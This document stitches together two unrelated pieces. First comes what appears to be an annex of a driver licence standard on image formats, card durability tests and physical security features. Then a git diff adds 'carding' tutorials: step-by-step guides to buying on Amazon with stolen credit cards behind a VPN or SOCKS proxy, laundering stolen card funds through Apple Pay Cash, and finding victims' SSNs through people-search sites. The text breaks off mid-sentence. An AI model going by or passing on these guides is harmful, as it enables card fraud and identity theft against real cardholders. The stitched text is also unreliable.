Sub sampling +It is required that the CrCb band subsampling be one of the following two options. +NOTE The intensity band Y is never subsampled. +72 + +¾ Every other sample in the horizontal and the vertical directions. +¾ Every other sample in the horizontal direction only, no subsampling in the vertical direction. +F.3.1.1.4.2 Interleaving +It is required that the data be interleaved and compressed as Y, then Cb, then Cr. +F.3.1.1.4.3 Table Signaling +It is required that both the Huffman Tables and Quantization Tables be sent one time. +F.3.1.2 Signatures +Tables F.4 and F.5 define the specifications for signatures by shading in the required elements for licensing / +identification applications. +F.3.1.2.1 Image Data Formats +The image header can define the image size, the number of bits per pixel, the scan start and scan order. This allows +any application to process the images appropriately. For signature images, 8 bits per pixel gray scale or binary images +are required. +F.3.1.2.2 Image Compression Methods +¾ For Gray Scale signatures use the shaded portions of Table F.4. +¾ For binary signatures use the shaded portions of Table F.5. +73 + +Table F.4 — Requirements for signatures gray scale +CATEGORY DECISION POINTS +Image Type Gray Scale Binary +Bits per Pixel 8 · 4 1 +· 10 +· 12 +Standards * JPEG Baseline JPEG Extension CCITT CCITT +· Controlled Quality; · Lossless; Group Group +· 8 Bit per Component; · Progressive DCT; III IV +· Sequential DCT; and · Arithmetic Coding; and +· Huffman Coding · Greater than 8 bits +Conversion Left Justify Not Applicable +Scheme +Quantization Send Once Send with each Data Not Applicable +Tables Stream +Huffman Tables Send Once Send with each Data Not Applicable +Stream +Image Data · Size +Formats · Scan Start +· Scan Order +· Pixel Format +Dimensionality Not Applicable 1 2 2 +Only +Table F.5 — Requirements for Signatures Binary +CATEGORY DECISION POINTS +Image Type Gray Scale Binary +Bits per Pixel 8 · 4 1 +· 10 +· 12 +Standards * JPEG Baseline JPEG Extension CCITT CCITT +· Controlled Quality; · Lossless; Group Group +· 8 Bit per Component; · Progressive DCT; III IV +· Sequential DCT; and · Arithmetic Coding; and +· Huffman Coding · Greater than 8 bits +Conversion Left Justify Not Applicable +Scheme +Quantization Send Once Send with each Data Not Applicable +Tables Stream +Huffman Tables Send Once Send with each Data Not Applicable +Stream +Image Data · Size +Formats · Scan Start +· Scan Order +· Pixel Format +Dimensionality Not Applicable 1 2 2 +Only +74 + +F .3.1.3 Associated JPEG Parameters +F.3.1.3.1 Interchange Format +The recommended file interchange can be found in Table F.2. This interchange file format is intended to give the +receiver of image transmission a method of converting the images from one Pre-JPEG or JPEG image format to +another for viewing or printing. +F.3.1.4 Options to Optimize Performance +F.3.1.4.1 Table Signaling +It is required that both the Huffman Tables and Quantization Tables be sent one time. +F.4 Signature Compressed Vector Format +Signatures collected from digital signature tablets where the data takes the form of a list of x, y coordinates, the +compressed vector format may be used to losslessly store and transmit this data. The Signature Compressed Vector +Data format shall consist of a file header followed by a variable length field containing the vector data. The top left +coordinate of a signature shall be taken as the origin (0, 0). The x coordinate shall be defined as the horizontal +coordinate increasing to the right. The y coordinate shall be defined as the vertical coordinate increasing in the +downward direction. +origin (0 , 0) x +y +Figure F.1 Signature format +75 + +F.4.1 File Header Format +The file header shall consist of the identifying 3 byte tag “SIG” (hexadecimal values 53, 49, 47) followed by the x and y +resolution of the tablet and the number of points in the vector data portion. +F.4.1.1 Horizontal Resolution +The horizontal resolution of the signature shall be recorded in 2 bytes as an integer number representing pixels per +inch. +F.4.1.2 Vertical Resolution +The vertical resolution of the signature shall be recorded in 2 bytes as an integer number representing pixels per inch. +F.4.1.3 Number of Vectors +The number of vectors contained in the vector data shall be recorded as an integer number in 2 bytes. +F.4.2 Vector Data Format +The list of x, y coordinates shall be processed in the order recorded during the signature. All coordinates shall be +represented as a vector from the previously recorded point (X – previous X, Y – previous Y). The first vector of a +signature shall be considered to be taken from the top left coordinate (0, 0). Each vector shall be recorded with the +offset in x first, then the offset in y. Each offset shall be recorded either as a small offset or a large offset. Both offsets +in a vector need not be recorded using the same offset format. Each vector shall indicate a pen movement of nonzero +distance. It is not allowed to represent no movement of the pen using a vector of (0, 0), because this is reserved to +indicated the lifting of the pen. +F.4.2.1 Small Offset +A small offset shall be any difference greater than or equal to –63 and less than or equal to 63. A small offset shall be +recorded in one byte, where the most significant bit set 0 and the next significant bit is the sign bit followed by 6 bits of +magnitude. The sign bit shall be set to 1 if the offset is negative, 0 otherwise. +F.4.2.2 Large Offset +A large offset shall be any difference less than –63 or greater than 63. A larger offset shall be recorded in two bytes, +where the most significant bit set 1 and the next significant bit is the sign bit, followed by 14 bits of magnitude. The +sign bit shall be set to 1 if the offset is negative, 0 otherwise. +76 + +F.4.2.3 Pen Lift +Signature Compress Vector Data Stream +File Header +dx & dy offset pairs +one-byte offset +( -63 to 63) +T - offset type: 0 = one-byte, 1 = two-byte +T S M M M M M M +S - sign bit: 0 = non-negative, 1 = negative +M - magnitude bits +two-byte offset +(-16383 to 16383) +T S MM M M M M MM M M M M M M +Figure F.2 Signature data stream +The lifting of the pen shall be represented as a vector of (0, 0) in the vector data. The vector following an pen lift vector +(0, 0) shall indicate the jump to the next pen down of the signature from the point just before the pen lift vector. The +pen lift offset shall be counted as a vector for the number of vectors parameter in the file header. There is no +requirement to end the signature with a pen lift offset. +F.5 Digital Images +Digital Images shall be placed in, but not limited to, four categories: +¾ Category A: Digital Facial Portrait Images +¾ Category B: Digital Signature Images +¾ Category C: Digital Finger Images (See Finger Imaging Annex C) +¾ Category D: Ghosted Images +F.5.1 Category A - Facial Portrait Image (Capture) +F.5.1.1 Pose +The full-face or frontal pose is the most commonly used pose in driver licenses. +F.5.1.2 Depth of Field +The subject's captured facial image shall always be in focus from the nose to the ears. +77 + +F.5.1.3 Centering +The facial image being captured (full-face pose) shall be positioned to satisfy all of the following conditions: +a) The approximate horizontal midpoints of the mouth and of the bridge of the nose shall lie on an imaginary vertical +straight line positioned at the horizontal center of the image. See line AA in Figure 3. +b) An imaginary horizontal line through the center of the subject's eyes shall be located at approximately the 55% +point of the vertical distance up from the bottom edge of the captured image. See line BB in Figure 3. +c) The width of the subject's head shall occupy approximately 50% of the width of the total image width. This width +shall be the horizontal distance between the midpoints of two imaginary vertical lines. Each imaginary line shall be +drawn between the upper and lower lobes of each ear and shall be positioned where the external ear connects to +the head. See line CC in Figure 3. +Figure F.3 Centering facial image +F.5.1.4 Lighting +Adequate lighting shall be used to fully illuminate the subject during capture. Appropriate techniques shall also be +employed and light(s) positioned to minimize shadows and hot spots on the facial image. +F.5.1.5 Background +The subject whose image is being captured for the purposes of issuing a general drivers license document shall be +positioned in front of a blue background. +It is desired that utilization of a single color backdrop will allow for easier exchange and usage of previously captured +images between jurisdictions. +NOTE Currently 48 US and 8 Canadian jurisdictions utilize a blue color background for general driver licenses. +F.5.1.6Aspect Ratio +The Width:Height aspect ratio of the facial portrait image shall be in accordance with the universal camera standard of +1:1.333 for portrait images. +Cropping of the original captured image prior to compression and storage is permissible provided that the cropping +technique maintains the specified aspect ratio of 1:1.333 and the minimum and maximum pixel width:height +requirement and the image is stored with the defined aspect ratio above. +78 + +Applications outside of Driver Licensing utilizing the images for reproduction, display, etc. shall adhere to the defined +aspect ratio. +F.5.1.7 Color Space +Captured electronic color facial images shall adhere to the Color Space Translation requirements in F.3.1.1.3.2. +Additional color management techniques are available from the International Color Consortium. Information regarding +these techniques can be downloaded from the following URL: http://www.color.org +F.5.1.8 Compression Algorithm +The algorithm used to compress facial portrait images shall conform to the JPEG Sequential Baseline mode of +operation as described in Table F.3. +NOTE Applications which utilize the compressed JPEG facial portrait image may have to perform an analysis of the +information contained within the graphic file for external purposes. (i.e., Facial Recognition Matching Algorithm) A significant loss +of data resulting from image compression may interfere with these processes. The compression and lossy values utilized should +accommodate such external uses as may be necessary. +F.5.1.9 File Format +Please refer to the Transmission section F.3 of this Annex. +F.5.2 Category A - Facial Portrait Image (Document) +F.5.2.1 Aspect Ratio +The width:height aspect ratio of the printed facial portrait image shall be 1:1.333, in accordance with the capture +aspect ratio in Section F.5.1.6. +F.5.2.2 Facial Portrait Image Dimensions +The minimum width:height of a facial portrait image printed on a driver license document shall be 25.4 millimeters +(1.000 inches) in the horizontal direction by 33.9 millimeters (1.333 inches) in the vertical direction. +F.5.2.3 Borders +Colored borders or frames surrounding the facial portrait image are optional and may present useful purposes in +distinguishing various driver license types. These borders shall adhere to the following rules: +a) Borders shall not overlap nor interfere with the human-readable functionality of the facial portrait image. +b) Borders shall not obstruct the data contained within the image nor reduce or alter the image aspect ratio of +1.1.333. +c) Borders shall not form part of the original captured, stored or compressed facial portrait image, but shall be +applied through utilization of preprinting or another method during the production of the finished document. +F.5.3 Category B - Signature Images (Capture) +F.5.3.1 Digitization +Any method of converting a handwritten signature into a digital format for the purpose of inclusion on a driver license +document must meet the following criteria: +79 + +Manual or automatic resizing or cropping of the captured image shall not alter the width:height aspect ratio of the +original signature. +a) A target aspect ratio of 4:1 width:height shall be utilized. +b) Cropping of the signature shall maintain the target 4:1 width/height aspect ratio. +c) The minimum (100 pixels per inch) resolution requirements shall be met. +F.5.3.2 Compression and Storage +Refer to section F.3 of this annex. +F.5.3.3 File Format +Refer to section F.3 of the annex. +F.5.4 Category B - Signature Images (Document) +F.5.4.1 Aspect Ratio +The target width:height aspect ratio of the printed signature image shall be 4:1, in accordance with the capture aspect +ratio in Section F.5.3.1 above. +F.5.4.2 Signature Image Dimensions +The minimum width:height of a printed signature image on a driver license document shall be 25.4 millimeters (1.000 +inches) in the horizontal direction by 6.35 millimeters (0.25 inches) in the vertical direction. +F.5.4.3 Borders +Colored borders or frames surrounding the signature image are optional and may present useful purposes in +distinguishing various driver license types. These borders shall adhere to the following rules: +a) Borders shall not overlap nor interfere with the human-readable functionality of the signature image. +b) Borders shall not obstruct the data contained within the image nor reduce or alter the signature image aspect ratio +of 4:1. +c) Borders shall not form part of the original captured, stored or compressed signature image, but shall be applied +through utilization of preprinting or another method during the production of the finished document. +F.5.5 Category C - Finger Images (Capture) +F.5.5.1 Standards +The electronic capture and storage of finger image data is relatively new to the digital imaging industry and as such +there remains a lack of internationally recognized standards for the capture, quality, minutiae extraction, storage, +security, and exchange of resulting data. However, the following standards have been established and form a basis for +the capture and storage of electronic finger image data, and provide the image formats necessary to perform future +applications that may be required: +¾ ANSI/NIST-CSL 1-1993 Data Format for the Interchange of Fingerprint Information, ANSI, November 22, 1993. +80 + +¾ WSQ Gray-Scale Fingerprint Image Compression Specification, IAFIS-IC-0110V2, Criminal Justice Information +Services (CJIS), Federal Bureau of Investigation, February 16, 1993. +Refer to annex C of this document for finger imaging standards. +F.5.6 Category C - Finger Images (Document) +Please refer to the applicable machine readable Annex sections of this document in regard to storing finger image data +on a document. +F.5.7 Category D - Ghosted Images (Capture) +Ghosted images refer to the increased reduction in data of an existing facial portrait image that has been decreased in +intensity, contrast and often overall dimensions. +Ghosted images used in a driver license document are utilized as an added form of security. For this purpose the +“ghosted” image shall refer to a duplication of the Facial Portrait Image manipulated during the card personalization +process and shall utilize those specifications in subclause F.5.1. in regard to capture and storage. +The ghosted image is not generally a separate image for the purposes of storage but most commonly a mechanical or +electrical manipulation of the existing primary facial portrait image. +F.5.8 Category D - Ghosted Images (Document) +No standards exist for the utilization of ghosted images; however, the following guidelines shall be applied when +ghosted images are applied to a driver license document: +a) The ghosted image utilized in a driver license document shall utilize the exact same Facial Portrait Image that +appears on the same document. +b) The ghosted image shall be easily recognizable by human-readable means as a replication of the Facial Portrait +Image contained elsewhere on the same document. +c) The ghosted image shall not interfere with the ability to recognize and decipher any human-readable or machine- +readable data contained elsewhere on the document. +d) The ghosted image shall maintain the aspect ratio specified in subclause F.5.1, consistent with the facial portrait +image. +81 + +82 + +Annex G +(normative) +Test Methods +Introduction (informative) +Driver license jurisdictions need some level of assurance about card service life. Therefore, jurisdictions are requiring +card durability test results when requests for proposal (RFP) are made. The RFPs often include inadequately defined +test methods that leave test details up to the test laboratory’s discretion. The result is that test data will often be +significantly affected by the discretionary details. +The ANSI NCITS 322 test methods were developed by industry experts from card component suppliers, card +manufacturers, and card personalization companies. The objective was to provide standardized tests capable of giving +reproducible results. +These accelerated laboratory test methods are the group’s best effort to simulate field failures. Relevancy and +correlation between predicted card service life and ANSI NCITS 322 test data has not been established at the time of +publication. Test results only provide a means of ranking or comparing one card structure to another. Future work is +planned to determine relevancy of and correlation between card test methods and card service life. +G.1 Scope +This annex provides a set of precisely defined card durability test procedures based on ANSI NCITS 322. The +usefulness of results obtained from these test methods is only to compare or rank the relative durability of one card +structure to another. +G.2 Conformance +A test result is in conformance with this annex if it meets all the mandatory requirements specified directly or by +reference herein. Test results shall not be represented as equivalent to card service life. +G.3 Normative references +The following normative documents contain provisions which, through reference in this text, constitute provisions of +this annex. For dated references, subsequent amendments to, or revisions of, any of these publications do not apply. +For undated references, the latest edition of the normative document referred to applies. +ANSI NCITS 322, For information technology-Card durability test methods: 1998 +ISO 10373-1, Identification cards - Test methods - General characteristics tests +83 + +G.4 Terms and definitions +For the purposes of this annex, the following terms and definitions apply: +G.4.1 card service life +period of time between card issuance and expiration date +G.5 Test methods and sample size +Only the test methods described in ANSI NCITS 322 shall be used. Performing multiple tests on the same card shall +not be done. Sample size is not specified, however some tests require more than 1 card in order to obtain a single +result. +Note (Informative) Test precision is unknown for the individual test methods. Therefore, caution should be taken +when determining if the test result differences between card types is large enough to be statistically significant. It is +strongly recommended that one laboratory perform comparison testing for all card types being evaluated. If possible, +cards from different vendors should also be tested simultaneously to minimize test variability. Sample sizes necessary +to reach statistical confidence are unknown. Typical sample sizes used by industry are shown in the tables below. +ANSI NCITS 322 recommended sample size (Informative) +Clause Test description Card orientation Typical +sample +size +NA = not applicable # cards +5.1 Delamination-90 degrees NA 6 +5.2 Delamination-180 degrees NA 6 +5.3 Delamination-Heat Transfer Film Layers NA 6 +5.4 ID-1 Card Flexure axis A, face up 4 +axis A, face down 4 +axis B, face up 4 +axis B, face down 4 +5.5 ID-1 Card Static Stress axis A, face up 25 +axis A, face down 25 +axis B, face up 25 +axis B, face down 25 +84 + +5.6 ID-1 Card Stress and Plasticizer Exposure axis A, face up 4 +axis A, face down 4 +axis B, face up 4 +axis B, face down 4 +5.7 Impact Resistance NA 25 +5.8 Card Structural Integrity NA 15 +5.9 Surface Abrasion NA 6 +5.10 Bar Code Abrasion NA 6 +5.11 Mag Stripe Abrasion NA 6 +5.12 Image Abrasion NA 6 +5.13 Temperature and Humidity Induces Dye Migration NA 6 +5.14 Plasticizer Induced Dye Migration NA 6 sets of 5 +5.15 Ultraviolet (UV) Light Exposure Stability test both sides of card 6 +5.16 Daylight Image Stability-Xenon Arc test both sides of card 6 +5.17 Laundry Test NA 6 +5.18 Embossed Character Retention-Pressure NA 6 +5.19 Embossed Character Retention-Heat NA 6 +ISO 10373-1 recommended sample size (Informative) +Test description Card orientation Typical +sample +size +clause NA = not applicable # cards +5.9 DDyynnaammiicc ttoorrssiioonnaall ssttrreessss ((ttoorrssiioonn)) NA 6 +85 + +G.6 Test report +For each test performed, the following information shall be included in the test report: +- ANSI NCITS 322 or ISO 10373-1 date and clause number +- test method title +- sample size used +- date when testing was completed +- identifying name or number to describe the type/color/style of card tested +- result for each card tested (numeric and/or qualitative) +86 + +Annex H +(informative) +Physical security features for the driver license/identification card +Introduction +This annex represents a sample of possible physical security features that may be used in the construction of a DL/ID. +This is NOT an all inclusive list and is for informational purposes only. +H.1 Features +(C = Covert, O = Overt, 1 = First Line Inspection, 2 = Second Line Inspection, 3 = Third Line Inspection) +(O1) Core Inclusion - It is possible to manufacture a plastic document with several different layers of core stock. A +colored core material can be added to the card construction to create a colored edge along the card. This technique is +currently used in the new INS Work Permit Card as a means of identifying a genuine document. +(C2/3) Deliberate Errors or Known Flaws - A feature or attribute known only to the manufacturer or inspection +officials. +(O2) Directional Metamerism - Directional metamerism refers to the use of colors that differ in spectral composition +but match one another under certain lighting conditions. Using this technique, designs can be created that will show +colors that appear to be identical under incandescent light but, under colored light, appear as different colors and +patterns. +(O1) Embossed Characters - Embossing is the impressing of raised characters to render a tactile pattern. The raised +characters will also render the card uneven/not flat, thereby making the card more difficult to reprint. It is possible to +develop unique embossing characters or logos that would not be included in commercially available embossers. +(C1/2) Fine Line Background - Commonly called “guilloche patterns,” this detailing prevents accurate reproduction +by copiers or standard document scanners, especially when used in conjunction with Rainbow Printing. A fine line +background is constructed by using two or more intricately overlapping bands that repeat a lacy, web-like curve pattern +on fine unbroken lines. +(O1) Ghost Image or Ghost Printing - Digital printing technology has made possible the printing of a “ghost” image, +a half tone reproduction of the original image, which is typically printed in the same area as the personal data. The +second image appears as a light background to text data, significantly increasing the difficulty of altering the photo +image or the data. +(O1) Holograms - A hologram is a microscopically fine diffraction structure by which two or three-dimensional images +are generated. The metallized reflective hologram has been a security feature for Visa and MasterCard cards for more +than 10 years. The intrinsic security of the hologram results from a moveable image when viewed from different +angles. It is not receptive to photography, photocopying, or scanning, and it requires highly specialized equipment to +replicate designs. +(C2/3) Ink Taggants - Special inks have been formulated with specific elements called “taggants.” These elements +react to electromagnetic energy sourced from a remote reader. By using these inks and measuring their reflection, it is +87 + +possible to identify designated card groupings or types. These taggant-carrying products are known as “smart” (or +“intelligent”) inks. +(O1) Kinegrams - Kinegrams, like holograms, can be produced on a reflective or transparent material. However, +unlike holograms, Kinegrams have only two-dimensional effects, and effects are observable under a wider variety of +lighting conditions. Also, Kinegrams can incorporate asymmetric optical effects that is, different optical variable effects +are viewable as the Kinegram is completely rotated (360 degrees). +(O1/3) Laser-Encoded Optical Image - The image and text files used to personalize and issue a document is laser- +encoded on to optical WORM media as a visible diffraction pattern image that is eye-readable under a variety of +lighting conditions. The personalized laser-encoded optical image is extremely difficult to simulate as it has a two- +dimensional appearance and the encoding registration on to the optical WORM media is at a sub-micron level of +accuracy. The laser-encoded optical image cannot be removed from the reflective optical WORM media nor can it be +duplicated or simulated by photocopying, photography or scanning. The laser-encoded optical image can be updated +by incorporating new diffraction pattern images or alphanumeric text as the document is updated or processed. +Furthermore, covert physical protection can be added by interleaving a copy of the digital file within the laser-encoded +optical image. This personalized security feature is currently used in the Permanent Resident Card ("Green Card”) +issued by the U.S. Immigration and Naturalization Service and the Border Crossing Card issued by the U.S. +Department of State. +(O1/2) Laser Engraving - Laser engraving has been used in Europe for more than 10 years on high-security plastic +cards for printing highly tamper-resistant variable data on a card. Using an intense laser beam, data is burned (or +“engraved”) into the inner core of the card. The information cannot be mechanically or chemically removed without +damaging the surface of the card, thereby providing an extremely effective tamper-resistant barrier. Laser engraving +can be performed with alpha-numeric characters, digitized images (such as photos or signatures), or bar-codes and +OCR characters. +(O1/2) Laser Perforation - This is the perforation of a document using laser technology. Unlike mechanical punching +techniques, the holes made by the laser beam are free from burrs and can easily be confirmed by feeling. The holes +created are also conical shape, with the entrance being larger than the exit. +(C2/3) Machine-Readable Technologies - The card design can incorporate inclusion of many machine-readable +technologies such as magnetic stripe, integrated circuit, 1D or 2D bar-codes, OCR, optical WORM media, machine- +readable holograms, etc. Verification of the authenticity of the document, the data, and/or the person presenting the +document can be accomplished with a card reader, depending on the technology employed. Common techniques to +ensure data integrity include: +– Check digits and data encryption (presumably with public key encryption) +– For IC cards, tamper detection and chip disabling; and digital signatures for all data written to the chip. +(O1) Metallic and Pearlescent Inks - Special iridescent inks fluctuate in brilliance depending upon the angle of +illumination and viewing. The typical appearance of metallic or pearl luster inks cannot be mimicked by color copiers or +reproduced by scanning and reprinting. +(O1/2) Micro Optical Imaging - Text, line art, gray scale images and multi-reflectivity images can be engineered into +optical WORM media at a resolution over 12,000dpi. This extremely high resolution is over 4 times higher than current +security printing techniques and therefore extremely difficult to simulate. The micro optical images cannot be removed +from the reflective optical WORM media nor can it be duplicated or simulated by photocopying, photography or +scanning. Micro optical imaging is mainly made up of visible images but can also incorporate digital data that can be +used for covert machine-readable security. Micro optical imaging is currently used in the U.S. Permanent Resident +Card, Border Crossing Card and several other commercial applications. +(O2) Microprinting - Miniature lettering, which is discernible under magnifying readers, can be incorporated into the +fine line background or can be placed to appear as bold lines. Visa, MasterCard, and American Express include +88 + +microprint as a standard security feature. Microprint was also added to U. S. currency in 1990. Accurate reproduction +of microprint cannot be accomplished as yet by photocopying or by commercially available color photography or color +scanners. +(C1/2) Moiré Pattern - A new pattern formed by the superpositioning of two patterns whose periodicities are not +identical. Security designs can be made so that a scanner or copier will only display part of the pattern, resulting in a +visible effect different from the original document. The original image can be designed so that a copy would reveal +indication of reproduction - typically showing the word “VOID” or “COPY”. This process is also referred to as aliasing. +(O1) Opacity Mark - The opacity mark, which is similar to a watermark, is a plastic that contains a unique translucent +opacity mark. It is similar in principle and effect to a watermark found in paper documents and enjoys a high level of +familiarity as a security feature. +(O1/2) Optical Variable Device - Optically Variable Device (OVD) is a general term describing a security feature +which changes appearance in some way when the angle of illumination or observation is changed. OVDs derive their +significance for valuable documents and goods from the impossibility of copying them with usual reproduction +techniques like color scanners and copiers. OVDs are often distinguished by being identified as either iridescent or +non-iridescent. +(O1/2) Optical Watermark - Fine line images can be engineered into optical WORM media at a resolution over +12,000dpi. The optical watermark is then overwritten with a laser-encoded optical image, interlocking in sub-micron +register, a preformatted document security feature with a laser encoded personalization security feature. This +extremely high resolution is over 4 times higher than current security printing techniques and therefore extremely +difficult to simulate. The optical watermark cannot be removed from the reflective optical WORM media nor can it be +duplicated or simulated by photocopying, photography or scanning. Attempting to tamper or alter the optical watermark +destroys the laser-encoded optical image. The optical watermark is currently used in the U.S. Permanent Resident +Card and Border Crossing Card. +(O1) Optically Variable Inks - Optically variable inks (OVI) can be incorporated into designs to create a striking color +shift (for example, green to purple, gold to green, etc.) depending on the angle of light used in viewing the card. This +material consists of a transparent colorless ink containing microscopic, advanced multi-layer interference structures. +OVI is precious, and production is available to secure printers only. Since the availability of these inks is highly +restricted, true counterfeiting is unlikely. +(O1) Overlapping Data - Variable data, such as a digitized signature or text, can be “overlapped” with another field, +such as a photo image. This technique makes it necessary to alter both fields if either one of them is changed, thereby +increasing the tamper resistance of the card by making it more difficult to alter. +(C2/3) Radio Frequency Technology - Use of radio frequency waves to activate and retrieve information from +another source. +(O1) Rainbow Printing - Sometimes called “iris printing,” involves a very subtle shift in color across a document. +Well-designed patterns cannot be accurately reproduced on color copiers or through the use of document scanners. +Widely perceived in Europe and Asia as an element of a secure document design, it is commonly used in conjunction +with a fine line or medallion pattern in the background of the document. +(O1) Redundant Data - Data can be displayed in more that one location on the ID, thereby raising the resistance to +alteration. A simple visual inspection is required to determine if all data fields match. Redundant data can also be +displayed in differing colors or fonts. +(O2) Retroreflective Devices - Optical constructions that reflect light such that covert logos become visible over the +entire document, and/or overt logos become more visible and reflective, when the document is viewed using a focused +light source. +89 + +(O1) Seal/Signature over Photo/Information - A type of unique identification that overlaps the photo and text area. +It can be a specific equipment number, state seal, coat of arms, flag, etc. The significance of this is to deter +substituting the photo and/or personal information. +(C2) Security Bonding - The card periphery on an optical memory card can incorporate a security bonding material +with known characteristics to bond all layers together. Tampering with the card periphery in an attempt to access +internal structures damages the known characteristics within the security bonding. This creates a tamper evident +feature. +(C2/3) Security Code - It is possible for high-resolution color printing systems to print a security code within the body +of the color printed photograph. For example, a security code can be printed in a non-proportional font that can imbed +characters on the edge or the bottom of the printed picture. The text can be printed on the image in colors that are +complementary to the image or in black. +(O1/2) Security Laminate - Transparent layers or films with an integrated security feature can be applied to a +document with an adhesive or fused by heat. Available in a number of forms security laminates are designed to protect +a document from alteration and provide tamper evidence. +(O1/2) Security Thread - First seen in U.S. banknotes the thread is visible by viewing in reflected or transmitted light +and can have text (positive or reverse) or other features on/in the thread. Security threads can be metal or plastic, +transparent or opaque, colored or colorless. With special metallized film, demetallized text is invisible in reflected light +and therefore cannot be copied reprographically. When viewed in transmitted light, however, the opaque aluminum +letters are clearly visible. +(C2/3) Specialized Inks - Special inks have been formulated with specific elements called “taggants.” These elements +can be detected by a remote reader or viewer. By using these inks and measuring their presence, it is possible to +identify designated card groupings or types. These taggant-carrying products are known as “smart” (or “intelligent”) +inks. +(O2) Thin-Film Interference Filters - Multiple-layer structures that produce color effects by interference. +(O1/2) Transparent Holograms - It is possible to incorporate holographic effects in a clear, transparent topcoat that +can be applied over variable printing. Through careful design and physical registration, the clear holographic topcoat +can serve as a deterrent to alteration in addition to its counterfeit protection features. If an attempt is made to remove +or alter the topcoat, tampering will be detectable without the need of special equipment. Because the transparent +hologram design reflects light at differing angles, accurate reproduction with a copier or scanner is cannot be +accomplished. +(C2) Ultraviolet (UV) Printing - Ultraviolet ink, which can be applied either through offset or silk screen techniques, +has long been accepted as a security feature for plastic cards. This invisible printing can be produced with the +availability of a color shift when viewed under long-wave UV light sources. UV radiation is not visible to the human eye, +but becomes visible when irradiated with a UV light. Custom UV fluorescing colors can be formulated that are not +normally available commercially, thereby increasing resistance to counterfeiting. +(C2) Void Pattern - A security device consisting of a period structure as an overt but not visible feature. When copied +on a machine with a different periodicity, the resulting moiré pattern displays the word “VOID” or some other message. +90 diff --git a/AMAZON ANDROID CARDING TECH_txt.md b/AMAZON ANDROID CARDING TECH_txt.md new file mode 100644 index 0000000..0fc1c2e --- /dev/null +++ b/AMAZON ANDROID CARDING TECH_txt.md @@ -0,0 +1,35 @@ +# AMAZON ANDROID CARDING TECH + + +--- + +CARDING AMAZON WITH AN ANDROID PHONE +1-GET HMA VPN OR SOCKS 5 - DOWNLOAD HERE https://play.google.com/store/apps/details?id=com.hidemyass.hidemyassprovpn + +2-USE FIREFOX BROWSER ON ANDROID PHONE + +3-GET YOUR CREDIT CARD OF CHOICE READY (VISA ,AMEX ,MASTER CARD) + +4-CONNECT HMA OR SOCKS 5 AND CHANGE YOUR IP TO THE CREDIT CARD OWNERS ADDRESS. + +5-AFTER YOU HMA/SOCKS 5 IS CONNECTED GO TO GMAIL.COM AND MAKE A GMAIL ID ON CC OWNERS NAME --DONT VERIFY THE GMAIL WITH YOUR OWN NUMBER-- + +6-NOW GO TO AMAZON.COM- DONT USE AMAZON.IN + +7-NOW CREATE A NEW ACCOUNT WITH ALL THE DETAILS + +8-AFTER ACCOUNT IS CREATED GO AND ADD AN ITEM TO CARD $100 IS A SAFE NO FLAGS MAXIMUM + +9-AFTER YOUR ITEM IS IN THE CART DONT CHECK OUT JUST SIGN OUT + +10-AFTER SIGN OUT PLUG YOUR PHONE INTO A CHARGER AND MAKE SURE IT DOESNT DIE AND MAKE DAMN SURE YOU NEVER DISSCONNECT FROM THE SOCKS OR HMA AND LEAVE IT FOR 5 HOURS + +11-AFTER 5 HOURS SIGN BACK IN AND CHECK OUT IF YOU WANT TO BUY THAT PRODUCT OR LEAVE IT + +12- SEARCH PRODUCT YOU WANT TO BUY AND ADD TO CART + +13-CLICK ON CART>CHECK OUT + +14-BILLING ADDRESS=CC OWNERS ADDRESS SHIPPING ADDRESS= YOUR RECIEVING ADDRESS + +15-COMPLETE PAYMENT VIA CREDIT CARD AND WAIT A FEW DAYS FOR DELIVERY diff --git a/AMAZON CARDING MADE EASY_txt.md b/AMAZON CARDING MADE EASY_txt.md new file mode 100644 index 0000000..3a4aa45 --- /dev/null +++ b/AMAZON CARDING MADE EASY_txt.md @@ -0,0 +1,20 @@ +# AMAZON CARDING MADE EASY + + +--- + +1, Put on UK VPN or SOCK5 +2. Clear all cookies with ccleaner or any good software +3. Get UK cc (Visa works best) +3. Go to hotmail.com then create email with name of cc ( If cc name is John Smith, make [You must be registered and logged in to see this link.] or similar) +4. Go to amazon.co.uk and click gift card then select print now +5. Pick a design and amount as 10 Pounds (Trust me) +6. Put the name you are sending to with same last name as cc ( If cc name John Smith send to Jake Smith or similar) +7. Click add to order then carry on and create new account with email you ade (john_smith@hotmail.co.uk) +8. Fill in all details then make order +9. In 5-7 minutes you will have your GC +10. Then you can do again and again with same CC but always do 10 Pounds because its guaranteed to work if CC has balance +11. From each good CC you should get 70 Pounds +12. When CC stop working clear cookies change IP and do again +13. You can add as many GC as you want to one Amazon acc. +14. That's it ! Enjoy diff --git a/APPLE PAY - original_pdf.md b/APPLE PAY - original_pdf.md new file mode 100644 index 0000000..fb14fd4 --- /dev/null +++ b/APPLE PAY - original_pdf.md @@ -0,0 +1,59 @@ +# APPLE PAY - original + + +--- + +The new method of carding +Let me first introduce myself. My name is Youngmoney. The name speaks for +itself I am a fucking money maker and I am in my twenties. The reason I am rich? +Almost Everyone can do it In the fraud game you can be stupid and succeed if you +read a lot about it. I will not say everyone will succeed because you need to focus +on your goals. I got kicked of college because I cant focus in class because that +kind of stuff is not important for me. I like making thousands of money today +instead of working 9-5 and that’s why I do this. +There is a lot going on in the carding world. We had hard times finding new +methods but apple pay is a gift, thank you 😉 +LET ME TELL YOU HOW YOU ARE GONNA MAKE THOUSANDS!! + +1. Get a new or an old Iphone or Ipad that has never been used with apple pay +cash. +2. Verify 1 of the accounts via apple pay cash. It has to match the name and +address on a driver license and the phone. +3. Once verified make another new accont on the same iphone/ipad if it let. If not +get a new phone or ipad. U can verify if u want if not u dont have 2. +4. Get a cc or debit log with email access and add it to apple pay. Once u have that +verified via bank or email access u can now send cash from the debit or cc. +5. 2 ways of adding money 1st way is to go to apple pay cash on the account the +cc or debit is on and click add money and its gone ask how much. If verified add +$1500 if not verified add $450. Once money is added u can go to imessage and +send to your other account via your money in apple pay cash. +6. The 2nd way is to send str8 to that person via imessage instead of adding it to +that account. +7. U can make 3 profiles per phone or ipad so just repeat steps. Apple DOES NOT +charge back so once u want to withdraw funds u can add your bank account and +send to that account. Can take 2-3 days to get deposited. +TIPS: I suggest u get a tlo on the person who card it is just incase it get blocked u +can call the bank and get it unblocked + +Goto Zillow.com +Look for recent sold houses with your ZiPcode, then copy address and search on Truthfinder.com, +You ll get the names of those staying in the house. +Run background check on their names to make sure they don’t have any AT&T number in the past or +present. +Then go search for their SSN on Robocheck.cm +Buy ssn from age about 40-50years and of same zip as your drop (same zip must be on drop I. D) +Then if date of birth of ssn u buy is different from the one 